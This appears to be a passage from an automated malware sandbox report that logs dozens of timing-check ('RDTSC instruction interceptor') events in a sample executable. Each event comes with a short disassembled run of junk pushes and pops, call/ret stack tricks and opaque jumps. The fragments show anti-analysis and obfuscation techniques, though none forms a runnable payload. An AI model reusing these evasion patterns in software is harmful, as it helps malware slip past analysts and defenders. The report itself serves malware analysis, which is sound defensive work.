Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868D9E second address: 1868DC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007F9334BA0031h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F9334BA0026h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186A310 second address: 186A32A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9334DAF9A1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186A39E second address: 186A3B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186A3B7 second address: 186A3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186AC0B second address: 186AC10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186AC10 second address: 186AC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186AF66 second address: 186AF6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186B38D second address: 186B397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186B397 second address: 186B39B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1833C1E second address: 1833C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F9334DAF996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9334DAF9A8h 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186E2C1 second address: 186E2D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1833C48 second address: 1833C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186E2D6 second address: 186E2ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA0033h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1833C4F second address: 1833C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186FBDF second address: 186FC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edi 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F9334BA0028h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 or dword ptr [ebp+12BD0136h], esi 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+12A21CE6h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F9334BA0028h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f jmp 00007F9334BA0036h 0x00000054 xchg eax, ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F9334BA002Ah 0x0000005c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186FC60 second address: 186FC65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186FC65 second address: 186FC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186FC6B second address: 186FC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9334DAF99Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186FC80 second address: 186FC87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187060A second address: 187060E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18703AC second address: 18703B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18703B0 second address: 18703BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18703BC second address: 18703C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1871C30 second address: 1871C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1871C3C second address: 1871C4E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F9334BA002Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1871C4E second address: 1871CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F9334DAF998h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000018h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 jng 00007F9334DAF99Ch 0x00000026 jo 00007F9334DAF996h 0x0000002c mov esi, edi 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F9334DAF998h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a pushad 0x0000004b mov dword ptr [ebp+12BC8A85h], esi 0x00000051 add edx, dword ptr [ebp+12A229E6h] 0x00000057 popad 0x00000058 push 00000000h 0x0000005a push eax 0x0000005b pop edi 0x0000005c jnl 00007F9334DAF99Ch 0x00000062 xchg eax, ebx 0x00000063 jmp 00007F9334DAF9A7h 0x00000068 push eax 0x00000069 pushad 0x0000006a jo 00007F9334DAF99Ch 0x00000070 ja 00007F9334DAF996h 0x00000076 push eax 0x00000077 push edx 0x00000078 jnl 00007F9334DAF996h 0x0000007e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187668B second address: 1876691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1876691 second address: 1876695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1876783 second address: 1876787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1876787 second address: 187678D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1879429 second address: 187944F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+12BA47F8h], ebx 0x00000014 push 00000000h 0x00000016 mov ebx, dword ptr [ebp+12A21CD3h] 0x0000001c push 00000000h 0x0000001e mov bl, cl 0x00000020 push eax 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187944F second address: 1879453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187863E second address: 1878643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1878643 second address: 1878651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187A864 second address: 187A869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187A869 second address: 187A87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF99Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187D550 second address: 187D55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9334BA002Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187D68C second address: 187D76A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx edi, si 0x0000000d push dword ptr fs:[00000000h] 0x00000014 jnc 00007F9334DAF9ABh 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007F9334DAF998h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b mov ebx, dword ptr [ebp+12A21D46h] 0x00000041 mov eax, dword ptr [ebp+12A20FE5h] 0x00000047 push 00000000h 0x00000049 push ecx 0x0000004a call 00007F9334DAF998h 0x0000004f pop ecx 0x00000050 mov dword ptr [esp+04h], ecx 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc ecx 0x0000005d push ecx 0x0000005e ret 0x0000005f pop ecx 0x00000060 ret 0x00000061 or edi, dword ptr [ebp+12A22A2Ah] 0x00000067 push FFFFFFFFh 0x00000069 mov edi, 1AE4222Fh 0x0000006e nop 0x0000006f jl 00007F9334DAF9B7h 0x00000075 push eax 0x00000076 jg 00007F9334DAF9A8h 0x0000007c push eax 0x0000007d push edx 0x0000007e jng 00007F9334DAF996h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18836D6 second address: 1883779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0033h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+12A21F0Bh], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F9334BA0028h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c call 00007F9334BA0033h 0x00000031 mov edi, dword ptr [ebp+12A21BDAh] 0x00000037 pop ebx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F9334BA0028h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 push eax 0x00000055 pushad 0x00000056 jns 00007F9334BA0028h 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F9334BA0034h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18807DF second address: 18807F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9334DAF996h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 188555E second address: 1885581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jbe 00007F9334BA0046h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9334BA0034h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1885581 second address: 1885585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187E83F second address: 187E845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187E845 second address: 187E84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1885585 second address: 18855EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F9334BA0028h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 and edi, 4CEE5DB2h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F9334BA0028h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 or dword ptr [ebp+12BA478Ch], ebx 0x00000049 mov edi, dword ptr [ebp+12A21CFCh] 0x0000004f push 00000000h 0x00000051 mov ebx, dword ptr [ebp+12A225D1h] 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push ebx 0x0000005c pop ebx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187E84A second address: 187E850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187E850 second address: 187E854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18875EF second address: 1887608 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A3h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1887608 second address: 188760E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 188760E second address: 188763C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9334DAF99Ah 0x00000012 jmp 00007F9334DAF99Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18838D1 second address: 18838F6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F9334BA0028h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 jg 00007F9334BA0028h 0x0000001b push eax 0x0000001c push edx 0x0000001d jl 00007F9334BA0026h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18838F6 second address: 1883971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 clc 0x00000009 push dword ptr fs:[00000000h] 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F9334DAF998h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+12BA7554h] 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 mov ebx, dword ptr [ebp+12A2191Ah] 0x0000003d mov eax, dword ptr [ebp+12A203B9h] 0x00000043 push FFFFFFFFh 0x00000045 mov edi, dword ptr [ebp+12BAE079h] 0x0000004b nop 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007F9334DAF9A5h 0x00000053 pushad 0x00000054 popad 0x00000055 popad 0x00000056 pop edx 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jnp 00007F9334DAF99Ch 0x00000060 jne 00007F9334DAF996h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 188575C second address: 18857FF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9334BA002Ch 0x00000008 jc 00007F9334BA0026h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F9334BA0028h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 add dword ptr [ebp+12A21998h], ecx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 pushad 0x00000042 cld 0x00000043 or dword ptr [ebp+12A21D02h], esi 0x00000049 popad 0x0000004a mov eax, dword ptr [ebp+12A214FDh] 0x00000050 push 00000000h 0x00000052 push edi 0x00000053 call 00007F9334BA0028h 0x00000058 pop edi 0x00000059 mov dword ptr [esp+04h], edi 0x0000005d add dword ptr [esp+04h], 0000001Ah 0x00000065 inc edi 0x00000066 push edi 0x00000067 ret 0x00000068 pop edi 0x00000069 ret 0x0000006a mov ebx, 1108B2B1h 0x0000006f push FFFFFFFFh 0x00000071 mov edi, dword ptr [ebp+12A21F0Bh] 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007F9334BA0038h 0x00000081 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18857FF second address: 1885805 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1885805 second address: 188580B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 189477B second address: 1894781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1894781 second address: 1894785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 189A314 second address: 189A318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 189A318 second address: 189A328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F9334BA0026h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 189A328 second address: 189A32C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 189A32C second address: 189A332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1830629 second address: 183064D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9334DAF996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F9334DAF9A7h 0x00000013 jmp 00007F9334DAF9A1h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183064D second address: 183065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA002Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 189916E second address: 189917E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F9334DAF996h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18996CA second address: 18996CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18996CE second address: 18996D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18996D4 second address: 18996DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18996DA second address: 18996E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18996E1 second address: 18996E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18996E7 second address: 18996F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 189985B second address: 1899867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1899C4D second address: 1899C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1899DB2 second address: 1899DB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1899EF5 second address: 1899F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334DAF99Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 189A1B3 second address: 189A1B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
